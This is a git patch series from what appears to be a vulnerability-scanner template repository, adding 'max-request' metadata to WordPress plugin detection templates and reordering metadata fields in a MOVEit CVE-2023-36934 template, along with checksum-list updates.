-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6577,7 +6578,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:9d73b0d12faadd8945da83c2d651d10835c87a4f +templates-checksum.txt:322a37f3ee018de224f277e9cee7a397b3d98bbd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 0dd1d1c36e376cb5e5ab99cc7e8eb4d076ba1fba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jul 2023 09:50:07 +0000 Subject: [PATCH 549/609] TemplateMan Update [Sun Jul 9 09:50:07 UTC 2023] :robot: --- http/cves/2023/CVE-2023-36934.yaml | 8 ++++---- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + .../technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + .../wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + .../wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + .../wordpress/plugins/better-search-replace.yaml | 1 + .../wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + .../wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + .../wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + .../wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + .../wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + .../technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + .../wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + .../wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../plugins/essential-addons-for-elementor-lite.yaml | 1 + .../wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + .../technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + .../wordpress/plugins/ga-google-analytics.yaml | 1 + .../wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + .../wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + .../wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + .../wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../wordpress/plugins/official-facebook-pixel.yaml | 1 + .../wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + .../wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + .../wordpress/plugins/really-simple-captcha.yaml | 1 + .../technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + .../wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + .../wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + .../technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + .../technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + .../wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + .../wordpress/plugins/taxonomy-terms-order.yaml | 1 + .../wordpress/plugins/the-events-calendar.yaml | 1 + .../wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + .../wordpress/plugins/woo-variation-swatches.yaml | 1 + .../woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + .../wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + .../wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + .../wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + .../wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + .../wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 204 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index c1f475dbfc..6c08de989e 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -12,15 +12,15 @@ info: - https://thehackernews.com/2023/07/another-critical-unauthenticated-sqli.html classification: cve-id: CVE-2023-36934 - epss-score: 0.00047 cwe-id: CWE-89 cpe: cpe:2.3:a:progess:moveit_transfer:*:*:*:*:*:*:*:* + epss-score: 0.00047 metadata: - max-request: 1 - shodan-query: http.favicon.hash:989289239 - verified: true + max-request: 4 product: moveit_transfer + shodan-query: http.favicon.hash:989289239 vendor: progess + verified: true tags: cve,cve2023,moveit,rce,sqli,intrusive variables: session_cookie: "{{randstr}}" diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + 